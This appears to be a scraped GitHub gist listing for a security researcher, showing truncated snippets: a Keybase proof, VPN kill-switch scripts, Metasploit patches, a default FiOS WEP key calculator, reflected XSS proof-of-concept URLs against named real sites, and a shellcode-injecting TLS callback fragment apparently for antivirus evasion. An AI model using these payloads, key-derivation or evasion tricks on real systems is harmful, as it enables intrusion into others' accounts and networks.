View keybase.md

Keybase proof

I hereby claim:

  • I am gerry on github.
  • I am gerry (https://keybase.io/gerry) on keybase.
  • I have a public key whose fingerprint is F120 587B A599 B6B6 1ED6 1A37 DD61 36D6 59E5 4DEF

To claim this, I am signing this object:

View dns_logger.py
#!/usr/bin/env python
import sys
import random
import string
import datetime
import itertools
import threading
import traceback
import SocketServer
import operator as op
View fios-wep.py
# Calculate the lower 6 bytes of the WEP key, the upper 4 are from the MAC
# address of the router (1801 or 1F90)
def get_key(essid):
key = sum(int(val, 36) * (36**idx) for idx, val in enumerate(essid))
return hex(key)
# >>> print get_key("E3X12")
# 0x349fca
View htl_extract.py
#!/usr/bin/env python
"""htl_extract.py, Extracts the embedded source code from Cisco Security Agent Management Console.
Gerry <gerry@hiredhacker.com>
"""
import os
import sys
import struct
import pefile
from itertools import takewhile
View XSS Dump
https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E
http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4
https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E
https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29
https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;//
http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22
http://www.webroot.com/En_US/search-results.html?q=');alert('gerry
http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware
http://products.verizonwireless.com/index.aspx?';alert(1)//
View msf-rex.gemspec
# Drop this into msf3 root-dir as 'msf-rex.gemspec'.
#
# Create gem with:
# $ gem build msf-rex.gemspec
#
# Note there's already a "rex" rubygem, which is why we used 'msf-rex'.
# We can still "require 'rex'" though.
$: << 'lib'
View import_nessus_nbe.diff
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index 7e0bc73..9b5c8d8 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -5163,11 +5163,11 @@ class DBManager
# There is no place the NBE actually stores the plugin name used to
# scan. You get "Security Note" or "Security Warning," and that's it.
def import_nessus_nbe(args={}, &block)
- data = args[:data]
+ nbe_data = args[:data]
View update-pia-hosts.sh
#!/bin/sh -e
HOSTNAME=us-california.privateinternetaccess.com
# host us-california.privateinternetaccess.com|cut -d' ' -f4|tr \\n ,
HOST_IPS=198.8.80.220,198.8.80.223,198.8.80.33,198.8.80.149,198.8.80.180,198.8.80.221,198.8.80.50,198.8.80.203,198.8.80.162,198.8.80.176,107.152.98.168,198.8.80.222,107.152.98.159
IP=$(echo $HOST_IPS | tr , \\n | shuf - | head -n 1)
if grep -q $HOSTNAME /etc/hosts; then
sed -i "s/.*$HOSTNAME/$IP $HOSTNAME/" /etc/hosts
else
echo $IP $HOSTNAME >> /etc/hosts
View kill-switch.sh
#!/bin/sh -e
DEFAULT_IFACE=enp0s3
LOCAL_NET=$(ip -o -f inet addr show $DEFAULT_IFACE | awk '{print $4}')
HOST_IPS=198.8.80.220,198.8.80.223,198.8.80.33,198.8.80.149,198.8.80.180,198.8.80.221,198.8.80.50,198.8.80.203,198.8.80.162,198.8.80.176,107.152.98.168,198.8.80.222,107.152.98.159
ufw --force reset
ufw default deny outgoing
ufw default deny incoming
ufw allow out on tun0 from any to any
ufw allow in on tun0 from any to any
View evasions.py
offset = 0x1000 - len(scode) - 32
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5
tls_header += "\x5E" # POP ESI
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30]
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset
tls_header += "\x57" # PUSH EDI
tls_header += "\xFC" # CLD
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI]